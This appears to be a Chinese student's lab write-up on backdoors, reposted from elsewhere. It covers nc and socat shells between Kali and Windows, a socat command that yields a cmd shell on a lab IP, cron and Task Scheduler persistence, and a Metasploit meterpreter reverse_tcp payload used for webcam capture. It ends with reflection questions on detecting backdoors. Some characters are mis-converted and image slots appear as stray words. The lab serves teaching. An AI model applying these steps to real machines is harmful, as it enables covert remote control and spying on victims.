20155234 Exp2 後門原理與實踐

Windows得到Linux Shell

1.查看ip

2.監聽端口

3.實驗成功以下圖
linux

Linux得到Win Shell

1.查看虛擬機ip

2.監聽端口

3.實驗成功以下圖
web

使用NC傳輸數據

1.用crontab -e指令編輯一條定時任務shell

  • 輸入3,選vim.basic

    2.成功
    vim

    使用socat獲取主機操做Shell, 任務計劃啓動

    在Windows系統下,打開控制面板->管理工具->任務計劃程序,建立任務,填寫任務名稱後,新建一個觸發器
    在Kali環境下輸入指令socat - tcp:192.168.1.111:5234,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5234端口,此時能夠發現已經成功得到了一個cmd shell
    windows

    使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

    1.在Kali上使用msfconsole指令進入msf控制檯,set payload windows/meterpreter/reverse_tcp,使用監聽模塊,設置payload,設置反彈回連的IP和端口


    2.利用exploit,執行監聽,在windows中,利用20155210.exe運行20155210.exe

    3.使用webcam_snap指令可使用攝像頭進行拍照
    tcp

    思考題

    (1)例舉你能想到的一個後門進入到你係統中的可能方式?
  • 在網上下載的軟件
  • 系統自帶的後門
    (2)例舉你知道的後門如何啓動起來(win及linux)的方式?
  • 經過和其餘經常使用軟件捆綁運行
    (3)Meterpreter有哪些給你映像深入的功能?
  • 我我的以爲是得到擊鍵記錄從而得到密碼
    (4)如何發現本身有系統有沒有被安裝後門?
  • 經過監視程序,查看程序是否得到了不應得到的系統資源。工具

    實驗體會

    若是可以避免殺毒軟件,經過後門能夠隨意獲取不少系統的資源,有很大的危險3d

相關文章
相關標籤/搜索